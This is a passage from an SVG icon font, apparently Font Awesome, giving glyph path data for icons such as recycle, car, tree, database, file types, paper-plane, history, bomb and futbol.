c14.1006 -5.2998 23.4004 -18.7002 23.4004 -33.7002v-108.5zM358 233.2v73.2998l-85 -37v-68.2002zM154 343.9v-0.600586l102 -41.3994l102 41.3994v0.600586l-102 38.1992zM238 52.7998v75.4004l-85 -38.7998v-79.1006zM238 164.8v0.600586l-102 38.1992l-102 -38.1992
v-0.600586l102 -41.3994zM478 52.7998v75.4004l-85 -38.7998v-79.1006zM478 164.8v0.600586l-102 38.1992l-102 -38.1992v-0.600586l102 -41.3994z" />
    <glyph glyph-name="recycle" unicode="&#xf1b8;" 
d="M184.561 186.097c3.23242 -13.9971 -12.1221 -24.6348 -24.0674 -17.168l-40.7363 25.4551l-50.8672 -81.4014c-13.2832 -21.2559 2.07031 -48.9824 27.1221 -48.9824h51.9883c6.62695 0 12 -5.37305 12 -12v-40c0 -6.62695 -5.37305 -12 -12 -12h-51.8848
c-75.334 0 -121.302 83.0479 -81.4082 146.88l50.8223 81.3877l-40.7256 25.4482c-12.0811 7.54688 -8.96582 25.9609 4.87891 29.1582l110.237 25.4502c8.61133 1.9873 17.2012 -3.38086 19.1895 -11.9902zM283.122 369.012
c-12.2842 19.6543 -41.5449 20.3193 -54.2568 -0.0214844l-17.9609 -28.7432c-3.5127 -5.62012 -10.916 -7.3291 -16.5361 -3.81738l-33.9189 21.1953c-5.62012 3.51172 -7.33008 10.9131 -3.82031 16.5332l17.9629 28.7656c37.6074 60.1709 125.295 60.0332 162.816 0
l41.2627 -66.082l40.6875 25.4238c12.0771 7.55176 27.2646 -3.32324 24.0674 -17.168l-25.4502 -110.236c-1.97363 -8.55273 -10.5166 -13.9893 -19.1885 -11.9902l-110.237 25.4502c-13.8789 3.20508 -16.9297 21.6299 -4.87891 29.1572l40.7402 25.457zM497.288 146.88
c39.9268 -63.8828 -6.13379 -146.88 -81.4082 -146.88h-95.8799v-47.9893c0 -14.3105 -17.3105 -21.3184 -27.3135 -11.3145l-80 79.9883c-6.24805 6.24805 -6.24805 16.3799 0 22.627l80 79.9814c10.0713 10.0703 27.3135 2.90039 27.3135 -11.3125v-47.9814h95.9844
c25.0791 0 40.3926 27.749 27.1357 48.96l-27.5645 44.1123c-3.51172 5.62109 -1.80176 13.0234 3.81836 16.5361l33.8613 21.1582c5.62207 3.51367 13.0264 1.80273 16.5381 -3.82031z" />
    <glyph glyph-name="car" unicode="&#xf1b9;" 
d="M499.99 272c7.80957 0 13.54 -7.33984 11.6494 -14.9102l-6 -24c-1.33008 -5.33984 -6.12988 -9.08984 -11.6396 -9.08984h-20.0703c13.4199 -11.7305 22.0703 -28.7803 22.0703 -48v-48c0 -16.1299 -6.16016 -30.6797 -16 -41.9297v-54.0703
c0 -17.6699 -14.3301 -32 -32 -32h-32c-17.6699 0 -32 14.3301 -32 32v32h-256v-32c0 -17.6699 -14.3301 -32 -32 -32h-32c-17.6699 0 -32 14.3301 -32 32v54.0703c-9.83984 11.2598 -16 25.8096 -16 41.9297v48c0 19.2197 8.65039 36.2695 22.0801 48h-20.0703
c-5.50977 0 -10.3096 3.75 -11.6396 9.08984l-6 24c-1.90039 7.57031 3.83008 14.9102 11.6396 14.9102h59.8604l16.6396 41.5996c17.1104 42.7705 57.9307 70.4004 103.99 70.4004h127c46.0703 0 86.8799 -27.6299 103.98 -70.4004l16.6396 -41.5996h59.8701z
M147.93 289.83l-19.9297 -49.8301h256l-19.9297 49.8301c-7.29004 18.2197 -24.9404 30.1699 -44.5703 30.1699h-127c-19.6299 0 -37.2803 -11.9502 -44.5703 -30.1699zM96 128.2c19.2002 0 48 -3.19043 48 15.9502c0 19.1396 -28.7998 47.8496 -48 47.8496
s-32 -12.7598 -32 -31.9004c0 -19.1396 12.7998 -31.8994 32 -31.8994zM416 128.2c19.2002 0 32 12.7598 32 31.8994c0 19.1406 -12.7998 31.9004 -32 31.9004s-48 -28.71 -48 -47.8496c0 -19.1406 28.7998 -15.9502 48 -15.9502z" />
    <glyph glyph-name="taxi" unicode="&#xf1ba;" 
d="M462 206.36c28.5898 -6.40039 50 -31.8301 50 -62.3604v-48c0 -23.6201 -12.9502 -44.0303 -32 -55.1201v-40.8799c0 -17.6699 -14.3301 -32 -32 -32h-32c-17.6699 0 -32 14.3301 -32 32v32h-256v-32c0 -17.6699 -14.3301 -32 -32 -32h-32c-17.6699 0 -32 14.3301 -32 32
v40.8799c-19.0498 11.0801 -32 31.4902 -32 55.1201v48c0 30.5303 21.4102 55.96 50 62.3604l22 84.8398c9.59961 35.2002 41.5996 60.7998 76.7998 60.7998h11.2002v32c0 17.6699 14.3301 32 32 32h128c17.6699 0 32 -14.3301 32 -32v-32h11.2002
c35.2002 0 67.2002 -25.5996 76.7998 -60.7998zM96 96c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32zM116.55 208h278.9l-17.3906 67.1396c-2.01953 7.37988 -9.37988 12.8604 -14.8496 12.8604h-214.4
c-5.46973 0 -12.8291 -5.48047 -15.0596 -13.6396zM416 96c17.6699 0 32 14.3301 32 32s-14.3301 32 -32 32s-32 -14.3301 -32 -32s14.3301 -32 32 -32z" />
    <glyph glyph-name="tree" unicode="&#xf1bb;" horiz-adv-x="384" 
d="M378.31 69.5098c6 -6.79004 7.36035 -16.0898 3.56055 -24.2598c-3.75 -8.0498 -12 -13.25 -21.0098 -13.25h-136.86v-24.4502l30.29 -48.3994c5.32031 -10.6406 -2.41992 -23.1602 -14.3096 -23.1602h-95.9609c-11.8896 0 -19.6299 12.5195 -14.3096 23.1602
l30.29 48.3994v24.4502h-136.86c-9.00977 0 -17.2598 5.2002 -21.0098 13.25c-3.7998 8.16992 -2.43945 17.4697 3.56055 24.2598l79.8896 90.4902h-30.6299c-9.02051 0 -16.9805 5 -20.7803 13.0498c-3.79004 8.0498 -2.54004 17.2598 3.27051 24.04l78.1396 90.9102
h-28.8896c-9.10059 0 -17.3105 5.34961 -20.8701 13.6104c-3.51074 8.12988 -1.86035 17.5898 4.23926 24.0801l110.28 117.479c6.04004 6.4502 17.29 6.4502 23.3203 0l110.27 -117.479c6.10059 -6.49023 7.76074 -15.9502 4.24023 -24.0801
c-3.55957 -8.26074 -11.7598 -13.6104 -20.8604 -13.6104h-28.8896l78.1299 -90.8896c5.83008 -6.79004 7.08008 -16.0107 3.28027 -24.0508c-3.7998 -8.05957 -11.7705 -13.0596 -20.7803 -13.0596h-30.6299z" />
    <glyph glyph-name="database" unicode="&#xf1c0;" horiz-adv-x="448" 
d="M448 374.857v-45.7148c0 -40.2852 -100.333 -73.1426 -224 -73.1426s-224 32.8574 -224 73.1426v45.7148c0 40.2852 100.333 73.1426 224 73.1426s224 -32.8574 224 -73.1426zM448 272v-102.857c0 -40.2852 -100.333 -73.1426 -224 -73.1426s-224 32.8574 -224 73.1426
v102.857c48.125 -33.1426 136.208 -48.5723 224 -48.5723s175.874 15.4297 224 48.5723zM448 112v-102.857c0 -40.2852 -100.333 -73.1426 -224 -73.1426s-224 32.8574 -224 73.1426v102.857c48.125 -33.1426 136.208 -48.5723 224 -48.5723s175.874 15.4297 224 48.5723z
" />
    <glyph glyph-name="file-pdf" unicode="&#xf1c1;" horiz-adv-x="384" 
d="M181.9 191.9c-5 16 -4.90039 46.8994 -2 46.8994c8.39941 0 7.59961 -36.8994 2 -46.8994zM180.2 144.7c9.59961 -17.4004 21.7998 -31.2002 34.5 -40.7998c-23.9004 -4.7002 -44.6006 -14.9004 -62.9004 -21.9004c11.1006 19.4004 20.7002 42.5 28.4004 62.7002z
M86.0996 19.9004c5.80078 15.6992 28.2002 33.8994 34.9004 40.1992c-21.7002 -34.7998 -34.9004 -41 -34.9004 -40.1992zM248 288h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136
c0 -13.2002 10.7998 -24 24 -24zM240 116.2c-20 12.2002 -33.2998 29 -42.7002 53.7998c4.5 18.5 11.6006 46.5996 6.2002 64.2002c-4.7002 29.3994 -42.4004 26.5 -47.7998 6.7998c-5 -18.2998 -0.400391 -44.0996 8.09961 -77
c-11.5996 -27.5996 -28.7002 -64.5996 -40.7998 -85.7998c-0.0996094 0 -0.0996094 -0.100586 -0.200195 -0.100586c-27.0996 -13.8994 -73.5996 -44.5 -54.5 -68c5.60059 -6.89941 16 -10 21.5 -10c17.9004 0 35.7002 18 61.1006 61.8008
c25.7998 8.5 54.0996 19.0996 79 23.1992c21.6992 -11.7998 47.0996 -19.5 64 -19.5c29.1992 0 31.1992 32 19.6992 43.4004c-13.8994 13.5996 -54.2998 9.7002 -73.5996 7.2002zM377 343c4.5 -4.5 7 -10.5996 7 -16.9004v-6.09961h-128v128h6c6.40039 0 12.5 -2.5 17 -7z
M302.9 87.7002c0 0 -5.7002 -6.7998 -42.8008 9c40.3008 2.89941 46.9004 -6.2998 42.8008 -9z" />
    <glyph glyph-name="file-word" unicode="&#xf1c2;" horiz-adv-x="384" 
d="M224 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136zM281.1 192c-5.59961 0 -10.5 -3.90039 -11.5 -9.5c-24.1992 -111.4 -21.7998 -118 -21.5996 -129.2
c-0.799805 5.40039 -5.59961 29 -29.5996 129.4c-1.30078 5.39941 -6.10059 9.2002 -11.7002 9.2002h-29.1006c-5.59961 0 -10.3994 -3.7002 -11.6992 -9.10059c-22.1006 -90 -27.8008 -112.5 -29.4004 -122.7c-0.900391 12.7002 -5.40039 44.2002 -21 122.2
c-1.09961 5.7002 -6.09961 9.7002 -11.7998 9.7002h-24.5c-7.7002 0 -13.4004 -7.09961 -11.7002 -14.5996l37.7998 -168c1.2002 -5.5 6.10059 -9.40039 11.7002 -9.40039h37.0996c5.5 0 10.3008 3.7998 11.6006 9.09961c23.2002 93.1006 24.5 96.2002 25.5996 110.5h0.5
c4.7998 -29.2998 -0.200195 -7 25.6006 -110.5c1.2998 -5.2998 6.09961 -9.09961 11.5996 -9.09961h38c5.59961 0 10.5 3.7998 11.7002 9.2998l38 168c1.7002 7.60059 -4 14.7002 -11.7002 14.7002h-23.9004zM384 326.1v-6.09961h-128v128h6.09961
c6.40039 0 12.5 -2.5 17 -7l97.9004 -98c4.5 -4.5 7 -10.5996 7 -16.9004z" />
    <glyph glyph-name="file-excel" unicode="&#xf1c3;" horiz-adv-x="384" 
d="M224 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136zM284.1 205.5c5.10059 8 -0.599609 18.5 -10.0996 18.4004h-34.7998
c-4.40039 0 -8.5 -2.40039 -10.6006 -6.30078c-30.5 -56.7998 -36.5996 -68.5 -36.5996 -68.5c-16.5996 34.9004 -10.5 19.7002 -36.5996 68.5c-2.10059 3.90039 -6.2002 6.30078 -10.6006 6.30078h-34.7998c-9.5 0 -15.2998 -10.5 -10.0996 -18.5l60.2998 -93.5
l-60.2998 -93.5c-5.10059 -8 0.599609 -18.5 10.0996 -18.5h34.9004c4.39941 0 8.39941 2.39941 10.5 6.2998c26.5996 48.7998 30.1992 54 36.5996 68.7998c0 0 16.9004 -32.5 36.5 -68.7002c2.09961 -3.89941 6.2002 -6.2998 10.5996 -6.2998h34.9004
c9.5 0 15.2002 10.5 10.0996 18.5l-60.0996 93.5zM384 326.1v-6.09961h-128v128h6.09961c6.40039 0 12.5 -2.5 17 -7l97.9004 -98c4.5 -4.5 7 -10.5996 7 -16.9004z" />
    <glyph glyph-name="file-powerpoint" unicode="&#xf1c4;" horiz-adv-x="384" 
d="M193.7 176.8c8.7998 0 15.5 -2.7002 20.2998 -8.09961c9.59961 -10.9004 9.7998 -32.7002 -0.200195 -44.1006c-4.89941 -5.59961 -11.8994 -8.5 -21.0996 -8.5h-26.9004v60.7002h27.9004zM377 343c4.5 -4.5 7 -10.5996 7 -16.9004v-6.09961h-128v128h6
c6.40039 0 12.5 -2.5 17 -7zM224 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136zM277 146.8c0 44.2002 -28.4004 77 -72.9004 77h-81
c-6.59961 0 -12 -5.39941 -12 -12v-199.8c0 -6.59961 5.40039 -12 12 -12h30.8008c6.59961 0 12 5.40039 12 12v57.2002c22.2998 0 111.1 -12.7002 111.1 77.5996z" />
    <glyph glyph-name="file-image" unicode="&#xf1c5;" horiz-adv-x="384" 
d="M384 326.059v-6.05859h-128v128h6.05859c5.4873 0 13.0898 -3.14941 16.9707 -7.0293l97.9404 -97.9404c3.88086 -3.88086 7.03027 -11.4834 7.03027 -16.9717zM248 288h136v-328c0 -13.2549 -10.7451 -24 -24 -24h-336c-13.2549 0 -24 10.7451 -24 24v464
c0 13.2549 10.7451 24 24 24h200v-136c0 -13.2002 10.7998 -24 24 -24zM112.545 272c-26.5088 0 -48 -21.4902 -48 -48s21.4902 -48 48 -48s48 21.4902 48 48s-21.4902 48 -48 48zM320.545 32v112l-39.5137 39.5146c-4.6875 4.68652 -12.2852 4.68652 -16.9717 0
l-103.515 -103.515l-39.5146 39.5146c-4.68652 4.68652 -11.7988 5.1709 -16.4854 0.485352l-39.5146 -39.5146l-0.485352 -48.4854h256z" />
    <glyph glyph-name="file-archive" unicode="&#xf1c6;" horiz-adv-x="384" 
d="M377 343c4.5 -4.5 7 -10.5996 7 -16.9004v-6.09961h-128v128h6.09961c6.40039 0 12.5 -2.5 17 -7zM128.4 112c17.8994 0 32.5 -12.0996 32.5 -27s-14.5 -27 -32.4004 -27s-32.5 12 -32.5 27c0 14.9004 14.5 27 32.4004 27zM224 312c0 -13.2002 10.7998 -24 24 -24h136
v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h104.4v-32h32v32h63.5996v-136zM95.9004 416v-32h32v32h-32zM128.2 32c33 0 57.7998 30.2002 51.3994 62.5996l-17.2998 87.7002
c-1.09961 5.60059 -6.09961 9.7002 -11.7998 9.7002h-22.0996v32h32v32h-32v32h32v32h-32v32h32v32h-32v-32h-32v-32h32v-32h-32v-32h32v-32h-32v-32l-19.6006 -97.0996c-6.59961 -32.5 18.2002 -62.9004 51.4004 -62.9004z" />
    <glyph glyph-name="file-audio" unicode="&#xf1c7;" horiz-adv-x="384" 
d="M224 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2998 -10.7002 -24 -24 -24h-336c-13.2998 0 -24 10.7002 -24 24v464c0 13.2998 10.7002 24 24 24h200v-136zM160 44v136c0 10.7002 -12.9004 16.0996 -20.5 8.5l-35.5 -36.5h-28c-6.59961 0 -12 -5.40039 -12 -12
v-56c0 -6.59961 5.40039 -12 12 -12h28l35.5 -36.5c7.59961 -7.5 20.5 -2.2002 20.5 8.5zM193.2 91.5996c-22.5 -23.0996 12.5996 -55.7998 34.3994 -33.5c27.2002 28 27.2002 72.5 0 100.4c-22.1992 22.7002 -56.5 -10.7002 -34.3994 -33.5
c9.09961 -9.2998 9.09961 -24.0996 0 -33.4004zM279.2 208.7c-22.1006 22.7998 -56.5 -10.7002 -34.4004 -33.5c36.2998 -37.2998 36.2002 -96.6006 0 -133.8c-22.5996 -23.2002 12.6006 -55.9004 34.4004 -33.5c54.3994 56 54.3994 144.899 0 200.8zM384 326.1v-6.09961
h-128v128h6.09961c6.40039 0 12.5 -2.5 17 -7l97.9004 -98c4.5 -4.5 7 -10.5996 7 -16.9004z" />
    <glyph glyph-name="file-video" unicode="&#xf1c8;" horiz-adv-x="384" 
d="M384 326.059v-6.05859h-128v128h6.05859c6.36523 0 12.4707 -2.5293 16.9717 -7.0293l97.9404 -97.9404c3.87988 -3.88086 7.0293 -11.4834 7.0293 -16.9717zM224 312c0 -13.2002 10.7998 -24 24 -24h136v-328c0 -13.2549 -10.7451 -24 -24 -24h-336
c-13.2549 0 -24 10.7451 -24 24v464c0 13.2549 10.7451 24 24 24h200v-136zM320 167.984c0 21.4609 -25.96 31.9795 -40.9707 16.9697l-55.0293 -55.0127v38.0586c0 13.2549 -10.7451 24 -24 24h-112c-13.2549 0 -24 -10.7451 -24 -24v-112c0 -13.2549 10.7451 -24 24 -24
h112c13.2549 0 24 10.7451 24 24v38.0586l55.0293 -55.0088c15.0273 -15.0264 40.9707 -4.47363 40.9707 16.9717v111.963z" />
    <glyph glyph-name="file-code" unicode="&#xf1c9;" horiz-adv-x="384" 
d="M384 326.059v-6.05859h-128v128h6.05859c6.36523 0 12.4707 -2.5293 16.9717 -7.0293l97.9404 -97.9404c3.87988 -3.88086 7.0293 -11.4834 7.0293 -16.9717zM248 288h136v-328c0 -13.2549 -10.7451 -24 -24 -24h-336c-13.2549 0 -24 10.7451 -24 24v464
c0 13.2549 10.7451 24 24 24h200v-136c0 -13.2002 10.7998 -24 24 -24zM123.206 47.4951l19.5791 20.8838c0.805664 0.860352 1.45996 2.51465 1.45996 3.69336c0 1.34766 -0.820312 3.16309 -1.83203 4.05371l-40.7627 35.874l40.7627 35.874
c1.01172 0.890625 1.83203 2.70605 1.83203 4.05371c0 1.17871 -0.654297 2.83301 -1.45996 3.69336l-19.5791 20.8848c-0.882812 0.942383 -2.64844 1.70703 -3.93945 1.70703c-1.17871 0 -2.83398 -0.654297 -3.69336 -1.46094l-64.8662 -60.8115
c-0.942383 -0.883789 -1.70703 -2.64844 -1.70703 -3.93945c0 -1.29199 0.764648 -3.05664 1.70703 -3.94043l64.8662 -60.8115c0.859375 -0.806641 2.51465 -1.46094 3.69336 -1.46094c1.29102 0 3.05664 0.764648 3.93945 1.70703zM174.501 -2.98438
c0.407227 -0.118164 1.08203 -0.213867 1.50586 -0.213867c2.23926 0 4.56152 1.74512 5.18457 3.89551l61.4395 211.626c0.118164 0.407227 0.214844 1.08203 0.214844 1.50586c0 2.23828 -1.74512 4.56152 -3.89453 5.18555l-27.4521 7.9707
c-0.407227 0.117188 -1.08105 0.213867 -1.50488 0.213867c-2.23828 0 -4.5625 -1.74512 -5.1875 -3.89551l-61.4395 -211.626c-0.118164 -0.40625 -0.213867 -1.08105 -0.213867 -1.50391c0 -2.23926 1.74512 -4.56348 3.89453 -5.1875zM335.293 108.061
c0.942383 0.883789 1.70703 2.64844 1.70703 3.94043c0 1.29102 -0.764648 3.05566 -1.70605 3.93945l-64.8662 60.8115c-0.859375 0.806641 -2.51465 1.46094 -3.69336 1.46094c-1.29102 0 -3.05566 -0.764648 -3.93945 -1.70703l-19.5801 -20.8848
c-0.805664 -0.860352 -1.45996 -2.51465 -1.45996 -3.69336c0 -1.34766 0.820312 -3.16309 1.83203 -4.05371l40.7627 -35.874l-40.7637 -35.873c-1.01172 -0.890625 -1.83203 -2.70605 -1.83203 -4.05371c0 -1.17871 0.654297 -2.83301 1.45996 -3.69336l19.5801 -20.8848
c0.882812 -0.942383 2.64844 -1.70703 3.93945 -1.70703c1.17871 0 2.83398 0.654297 3.69336 1.46094z" />
    <glyph glyph-name="life-ring" unicode="&#xf1cd;" 
d="M256 440c136.967 0 248 -111.033 248 -248s-111.033 -248 -248 -248s-248 111.033 -248 248s111.033 248 248 248zM429.696 320.441c-10.6406 14.3398 -30.915 34.6143 -45.2549 45.2549l-63.3994 -63.3994c18.585 -11.0029 34.2676 -26.6963 45.2549 -45.2549zM256 96
c53.0186 0 96 42.9814 96 96s-42.9814 96 -96 96s-96 -42.9814 -96 -96s42.9814 -96 96 -96zM127.559 365.696c-14.3398 -10.6406 -34.6143 -30.915 -45.2549 -45.2549l63.3994 -63.3994c11.0029 18.585 26.6963 34.2676 45.2549 45.2549zM82.3037 63.5586
c10.6406 -14.3398 30.915 -34.6143 45.2549 -45.2549l63.3994 63.3994c-18.585 11.0029 -34.2676 26.6963 -45.2549 45.2549zM384.441 18.3037c14.3398 10.6406 34.6143 30.915 45.2549 45.2549l-63.3994 63.3994c-11.0029 -18.585 -26.6963 -34.2676 -45.2549 -45.2549z
" />
    <glyph glyph-name="circle-notch" unicode="&#xf1ce;" horiz-adv-x="511" 
d="M288 408.944c0 15.5996 14.6777 27.167 29.7891 23.292c107.071 -27.457 186.211 -124.604 186.211 -240.236c0 -136.788 -110.745 -247.711 -247.466 -247.999c-137.054 -0.289062 -247.812 109.615 -248.531 246.667c-0.609375 116.126 78.5996 213.85 185.951 241.502
c15.2119 3.91895 30.0459 -7.52539 30.0459 -23.2344v-16.6475c0 -10.8047 -7.28125 -20.1621 -17.6885 -23.0693c-77.5254 -21.6543 -134.312 -92.749 -134.312 -177.219c0 -101.705 82.3105 -184 184 -184c101.705 0 184 82.3105 184 184
c0 84.4824 -56.7959 155.566 -134.314 177.219c-10.4043 2.90723 -17.6855 12.2627 -17.6855 23.0664v16.6592z" />
    <glyph glyph-name="paper-plane" unicode="&#xf1d8;" horiz-adv-x="511" 
d="M476 444.8c17.2998 10 39 -4.59961 35.5996 -24.7998l-72 -432c-2.59961 -15.2998 -18.7998 -24.2002 -33 -18.2002l-124.6 52.2002l-63.5 -77.2998c-14 -17.1006 -42.5 -7.7998 -42.5 15.7998v80.5l240.9 293.5c4.69922 5.7002 -3.10059 13.2002 -8.60059 8.2998
l-287.3 -253.2l-106.3 44.6006c-18 7.59961 -20.2998 32.7998 -2.2002 43.2002z" />
    <glyph glyph-name="history" unicode="&#xf1da;" 
d="M504 192.469c0.25293 -136.64 -111.18 -248.372 -247.82 -248.468c-59.0146 -0.0419922 -113.223 20.5303 -155.821 54.9111c-11.0771 8.93945 -11.9053 25.541 -1.83984 35.6064l11.2676 11.2676c8.6084 8.6084 22.3525 9.55078 31.8906 1.9834
c31.3848 -24.9043 71.1045 -39.7695 114.323 -39.7695c101.705 0 184 82.3105 184 184c0 101.705 -82.3105 184 -184 184c-48.8145 0 -93.1494 -18.9688 -126.068 -49.9316l50.7539 -50.7539c10.0801 -10.0801 2.94141 -27.3145 -11.3125 -27.3145h-145.373
c-8.83691 0 -16 7.16309 -16 16v145.373c0 14.2539 17.2344 21.3926 27.3145 11.3135l49.3711 -49.3711c44.5234 42.5488 104.866 68.6846 171.314 68.6846c136.81 0 247.747 -110.78 248 -247.531zM323.088 113.685c-8.1377 -10.4629 -23.2158 -12.3467 -33.6787 -4.20996
l-65.4092 50.874v135.651c0 13.2549 10.7451 24 24 24h16c13.2549 0 24 -10.7451 24 -24v-104.349l40.7012 -31.6572c10.4629 -8.13672 12.3477 -23.2158 4.20996 -33.6787z" />
    <glyph glyph-name="heading" unicode="&#xf1dc;" 
d="M496 368c0 -8.83691 -7.16309 -16 -16 -16h-37.2754v-320h37.2754c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-160c-8.83691 0 -16 7.16309 -16 16v32c0 8.83691 7.16309 16 16 16h37.6201v128h-203.241v-128h37.6211
c8.83691 0 16 -7.16309 16 -16v-32c0 -8.83691 -7.16309 -16 -16 -16h-160c-8.83691 0 -16 7.16309 -16 16v32c0 8.83691 7.16309 16 16 16h37.2754v320h-37.2754c-8.83691 0 -16 7.16309 -16 16v32c0 8.83691 7.16309 16 16 16h160c8.83691 0 16 -7.16309 16 -16v-32
c0 -8.83691 -7.16309 -16 -16 -16h-37.6211v-128h203.242v128h-37.6211c-8.83691 0 -16 7.16309 -16 16v32c0 8.83691 7.16309 16 16 16h160c8.83691 0 16 -7.16309 16 -16v-32z" />
    <glyph glyph-name="paragraph" unicode="&#xf1dd;" horiz-adv-x="447" 
d="M408 416c13.2549 0 24 -10.7451 24 -24v-32c0 -13.2549 -10.7451 -24 -24 -24h-40v-344c0 -13.2549 -10.7451 -24 -24 -24h-32c-13.2549 0 -24 10.7451 -24 24v344h-32v-344c0 -13.2549 -10.7451 -24 -24 -24h-32c-13.2549 0 -24 10.7451 -24 24v104
c-88.3926 0 -160.044 71.6787 -160 160.082c0.0449219 88.583 72.9482 159.918 161.531 159.918h230.469z" />
    <glyph glyph-name="sliders-h" unicode="&#xf1de;" 
d="M496 64c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-336v-16c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v16h-80c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h80v16c0 8.7998 7.2002 16 16 16h32
c8.7998 0 16 -7.2002 16 -16v-16h336zM496 224c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-80v-16c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v16h-336c-8.7998 0 -16 7.2002 -16 16v32c0 8.7998 7.2002 16 16 16h336v16
c0 8.7998 7.2002 16 16 16h32c8.7998 0 16 -7.2002 16 -16v-16h80zM496 384c8.7998 0 16 -7.2002 16 -16v-32c0 -8.7998 -7.2002 -16 -16 -16h-208v-16c0 -8.7998 -7.2002 -16 -16 -16h-32c-8.7998 0 -16 7.2002 -16 16v16h-208c-8.7998 0 -16 7.2002 -16 16v32
c0 8.7998 7.2002 16 16 16h208v16c0 8.7998 7.2002 16 16 16h32c8.7998 0 16 -7.2002 16 -16v-16h208z" />
    <glyph glyph-name="share-alt" unicode="&#xf1e0;" horiz-adv-x="448" 
d="M352 128c53.0186 0 96 -42.9814 96 -96s-42.9814 -96 -96 -96s-96 42.9814 -96 96v0.0283203c0 5.8125 1.01953 15.1367 2.27637 20.8125l-102.486 64.0537c-16.4033 -13.0752 -37.1816 -20.8945 -59.79 -20.8945c-53.0186 0 -96 42.9814 -96 96s42.9814 96 96 96
c22.6084 0 43.3867 -7.81934 59.79 -20.8945l102.486 64.0537c-1.48633 6.71094 -2.27637 13.6826 -2.27637 20.8408c0 53.0186 42.9814 96 96 96s96 -42.9814 96 -96s-42.9814 -96 -96 -96c-22.6084 0 -43.3867 7.81934 -59.79 20.8965l-102.486 -64.0547
c1.25684 -5.68359 2.27637 -15.0205 2.27637 -20.8408c0 -5.82129 -1.01953 -15.1582 -2.27637 -20.8418l102.486 -64.0537c16.4033 13.0752 37.1816 20.8945 59.79 20.8945z" />
    <glyph glyph-name="share-alt-square" unicode="&#xf1e1;" horiz-adv-x="448" 
d="M448 368v-352c0 -26.5098 -21.4902 -48 -48 -48h-352c-26.5098 0 -48 21.4902 -48 48v352c0 26.5098 21.4902 48 48 48h352c26.5098 0 48 -21.4902 48 -48zM304 152c-14.5615 0 -27.8232 -5.56055 -37.7832 -14.6709l-67.958 40.7744
c0.960938 3.77539 1.74121 10.001 1.74121 13.8975c0 3.89551 -0.780273 10.1211 -1.74121 13.8965l67.958 40.7744c9.95996 -9.11133 23.2217 -14.6719 37.7832 -14.6719c30.9277 0 56 25.0723 56 56s-25.0723 56 -56 56s-56 -25.0723 -56 -56
c0 -4.79688 0.605469 -9.45312 1.74023 -13.8975l-67.958 -40.7744c-9.95898 9.11133 -23.2207 14.6719 -37.7822 14.6719c-30.9277 0 -56 -25.0723 -56 -56s25.0723 -56 56 -56c14.5615 0 27.8232 5.56055 37.7832 14.6709l67.958 -40.7744
c-0.960938 -3.7666 -1.74023 -9.97656 -1.74023 -13.8623v-0.0351562c0 -30.9277 25.0723 -56 56 -56s56 25.0723 56 56c-0.000976562 30.9287 -25.0732 56.001 -56.001 56.001z" />
    <glyph glyph-name="bomb" unicode="&#xf1e2;" 
d="M440.5 359.5l-52 -52l26.5 -26.5c9.40039 -9.40039 9.40039 -24.5996 0 -33.9004l-17.4004 -17.3994c11.8008 -26.1006 18.4004 -55.1006 18.4004 -85.6006c0 -114.899 -93.0996 -208 -208 -208s-208 93 -208 207.9s93.0996 208 208 208
c30.5 0 59.5 -6.59961 85.5996 -18.4004l17.4004 17.4004c9.40039 9.40039 24.5996 9.40039 33.9004 0l26.5 -26.5l52 52zM500 388c6.59961 0 12 -5.40039 12 -12s-5.40039 -12 -12 -12h-24c-6.59961 0 -12 5.40039 -12 12s5.40039 12 12 12h24zM440 448
c6.59961 0 12 -5.40039 12 -12v-24c0 -6.59961 -5.40039 -12 -12 -12s-12 5.40039 -12 12v24c0 6.59961 5.40039 12 12 12zM473.9 393c-4.60059 -4.7002 -12.2002 -4.7002 -17 0c-4.7002 4.7002 -4.7002 12.2998 0 17l17 17c4.69922 4.7002 12.2998 4.7002 17 0
c4.69922 -4.7002 4.69922 -12.2998 0 -17zM406.1 393l-17 17c-4.69922 4.7002 -4.69922 12.2998 0 17c4.7002 4.7002 12.3008 4.7002 17 0l17 -17c4.7002 -4.7002 4.7002 -12.2998 0 -17c-4.69922 -4.7002 -12.2998 -4.7002 -17 0zM473.9 359l17 -17
c4.69922 -4.7002 4.69922 -12.2998 0 -17c-4.7002 -4.7002 -12.3008 -4.7002 -17 0l-17 17c-4.7002 4.7002 -4.7002 12.2998 0 17c4.69922 4.7002 12.2998 4.7002 17 0zM112 176c0 35.2998 28.7002 64 64 64c8.7998 0 16 7.2002 16 16s-7.2002 16 -16 16
c-52.9004 0 -96 -43.0996 -96 -96c0 -8.7998 7.2002 -16 16 -16s16 7.2002 16 16z" />
    <glyph glyph-name="futbol" unicode="&#xf1e3;" 
d="M504 192c0 -136.967 -111.033 -248 -248 -248s-248 111.033 -248 248s111.033 248 248 248s248 -111.033 248 -248zM456 192l-0.00292969 0.282227l-26.0645 -22.7412l-62.6787 58.5l16.4541 84.3555l34.3027 -3.07227
